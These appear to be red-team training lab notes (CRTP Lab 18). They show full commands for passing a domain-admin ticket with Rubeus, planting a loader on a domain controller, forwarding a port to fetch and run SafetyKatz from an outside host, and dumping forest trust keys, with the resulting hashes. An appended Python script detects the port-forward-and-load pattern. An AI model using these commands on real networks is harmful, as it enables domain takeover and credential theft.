CRTP Lab 18
Task
# Start a DA process
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
# Copy Loader to dcorp-dc
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
# Open dcorp-dc shell
winrs -r:dcorp-dc cmd
# Setup port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::trust /patch" "exit"
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/11/2024 9:04:30 PM - CLEAR - 6c 5c 5a 6f 92 82 4f 17 79 cb de 1d a0 33 e0 38 e8 a9 53 09 41 00 a5 84 da e2 3a fa 16 a6 47 8c 16 ac 9d 55 56 f8 22 51 80 7a 97 42 6a 18 34 72 47 50 6b ed 98 9c 3c 61 6e 11 6f 68 21 05 a1 d3 a0 eb ab a3 31 69 ed 75 c0 3c 54 49 cc a3 9a ef 0d c9 aa b2 af b1 5a c9 e3 dc d6 58 6c 6d 6c 1f 07 c5 bb c1 a9 be 61 ed 53 e1 9c a1 b8 bd 65 4b 0a a4 34 e9 6d ae 0a e3 60 2f 52 c0 02 67 a0 c8 b6 88 16 20 a1 31 06 6f 49 26 fd 2c d0 48 c6 70 3e 7d 18 eb 19 e1 17 c2 3b 0f 6e 23 5c 12 09 ce 1a 1b 43 69 9c 3b c7 ab 82 16 24 be d9 58 0a b5 c3 cd 5f 18 c1 7c 0e 25 75 36 6d 8d 32 e0 ee 92 58 3d 7d a9 8a 1a 21 1a c5 58 cc 4a 68 c7 53 ff 39 70 e1 8d 2b e5 3f 1e 3d 62 2b 4a 39 17 14 19 e3 14 62 a5 f9 7d ec 18 6a be 0f d0 7c 58 c4 a0
* aes256_hmac bce498af44bfa1a1aacfe367a7e421aeac474d647e41cada56ba25855ae9966c
* aes128_hmac 2a2cd8447dea2f3a7ad2da6944a32f58
* rc4_hmac_nt 2aa6fd0eec0369f316217d65bb808e50
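
Added example, not part of the original lab notes: detection logic for the port-forwarding step above, run over process-creation command lines (for instance Event ID 4688 with command-line auditing). The sample events are constructed from the commands on this page; the function names and finding labels are assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: (host, command line) pairs built from the commands in these notes.
SAMPLE_EVENTS = [
    ("dcorp-dc", r"netsh interface portproxy show all"),
    ("dcorp-dc", r"netsh interface portproxy add v4tov4 listenport=8080 "
                 r"listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72"),
    ("dcorp-dc", r'C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe '
                 r'-args "lsadump::trust /patch" "exit"'),
]

ADD_RE = re.compile(r"\bnetsh(?:\.exe)?\s+interface\s+portproxy\s+add\s+v4tov4\b(.*)", re.I)
KV_RE = re.compile(r"(\w+)=(\S+)")
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def parse_portproxy(cmdline):
    """Return the rule's key=value parameters if cmdline adds a v4tov4 portproxy, else None."""
    m = ADD_RE.search(cmdline)
    if not m:
        return None
    return {k.lower(): v for k, v in KV_RE.findall(m.group(1))}


def correlate(events):
    """Flag each new forwarder, then any later process that loads a URL through it."""
    rules, findings = {}, []  # rules: (host, listenport) -> "connectaddress:connectport"
    for host, cmdline in events:
        rule = parse_portproxy(cmdline)
        if rule and "listenport" in rule:
            target = f"{rule.get('connectaddress')}:{rule.get('connectport')}"
            rules[(host, rule["listenport"])] = target
            findings.append(("portproxy_added", host, rule["listenport"], target))
            continue
        for url in URL_RE.findall(cmdline):
            parts = urlsplit(url)
            try:
                port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
            except ValueError:  # malformed port in the URL; nothing to correlate
                continue
            if parts.hostname in LOOPBACK and (host, str(port)) in rules:
                findings.append(("load_via_portproxy", host, url, rules[(host, str(port))]))
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

The second finding ties a process argument pointing at a loopback URL to the remote address the forwarder actually reaches, which a loopback-only view of the command line would hide.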